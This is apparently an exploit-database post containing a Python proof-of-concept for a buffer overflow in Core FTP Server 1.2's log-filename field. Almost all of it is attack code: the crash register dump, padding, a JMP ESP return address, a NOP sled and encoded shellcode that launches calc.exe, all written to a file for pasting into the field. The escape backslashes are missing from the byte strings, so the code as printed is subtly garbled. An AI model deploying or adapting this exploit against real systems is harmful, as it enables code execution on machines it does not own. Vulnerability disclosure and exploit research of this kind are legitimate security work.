Core FTP Server 1.2 Buffer Overflow
Posted on 23 February 2016
#-*- coding: utf-8 -*- # # Exploit Title : Core FTP Server v1.2 - BufferOverflow POC # Date: 2016-02-22 # Author: INSECT.B # Facebook : https://www.facebook.com/B.INSECT00 # GitHub : binsect00 # Blog : http://binsect00.tistory.com # Vendor Homepage : http://www.coreftp.com/ # Software Link: # Version: 1.2 # Tested on: Windows7 Professional SP1 En x86 # CVE : N/A ''' [+] Type : Buffer overflow [+] Detail : [-] The vulnerability has the most typical Buffer overflow vulnerabilities. [-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More] [-] 'Log filename(include path)' field is no limit to the length and does not check the length [-] Insert string "A"*1500 and press Ok, OK [-] crash info (3bc.e28): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001 eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 41414141 ?? ??? ''' import struct junk = "A" * 312 EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb: # 7795163b ffe4 jmp esp nop = "x90" * 10 #windows/exec calc.exe #encode : alpha_mixed sehll = ( "x89xe5xdbxdexd9x75xf4x59x49x49x49x49x49x49" + "x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" + "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" + "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" + "x75x4ax49x59x6cx68x68x6fx72x67x70x77x70x47" + "x70x75x30x6fx79x4ax45x44x71x49x50x30x64x6c" + "x4bx56x30x34x70x4ex6bx61x42x56x6cx6cx4bx71" + "x42x77x64x4cx4bx32x52x67x58x76x6fx6cx77x71" + "x5ax31x36x65x61x49x6fx4ex4cx67x4cx53x51x61" + "x6cx37x72x44x6cx47x50x4fx31x38x4fx54x4dx36" + "x61x58x47x58x62x69x62x46x32x51x47x6cx4bx61" + "x42x46x70x6cx4bx52x6ax75x6cx6ex6bx42x6cx34" + "x51x30x78x79x73x72x68x65x51x7ax71x30x51x6c" + "x4bx53x69x57x50x43x31x58x53x4cx4bx62x69x76" + "x78x58x63x75x6ax37x39x4cx4bx75x64x6cx4bx36" + "x61x4ex36x54x71x69x6fx6ex4cx5ax61x5ax6fx54" + "x4dx43x31x58x47x45x68x59x70x32x55x4bx46x64" + "x43x51x6dx58x78x45x6bx31x6dx55x74x50x75x48" + "x64x42x78x6cx4bx32x78x77x54x67x71x38x53x63" + "x56x4cx4bx66x6cx62x6bx6ex6bx52x78x35x4cx63" + "x31x68x53x6ex6bx45x54x4cx4bx46x61x5ax70x6c" + "x49x47x34x65x74x31x34x61x4bx31x4bx75x31x43" + "x69x52x7ax36x31x6bx4fx59x70x73x6fx63x6fx32" + "x7ax4cx4bx45x42x78x6bx6ex6dx43x6dx31x7ax63" + "x31x6cx4dx6cx45x4ex52x75x50x77x70x47x70x50" + "x50x63x58x66x51x4ex6bx62x4fx6bx37x6bx4fx7a" + "x75x6fx4bx4cx30x68x35x6fx52x61x46x43x58x69" + "x36x7ax35x4dx6dx4fx6dx69x6fx68x55x65x6cx56" + "x66x33x4cx37x7ax4dx50x49x6bx79x70x51x65x37" + "x75x4fx4bx31x57x75x43x61x62x70x6fx73x5ax73" + "x30x46x33x39x6fx6ax75x70x63x45x31x42x4cx63" + "x53x74x6ex71x75x31x68x73x55x57x70x41x41" ) payload = junk + EIP + nop + sehll with open("CoreFTPServer_Ex.txt","wb") as f : f.write(payload)
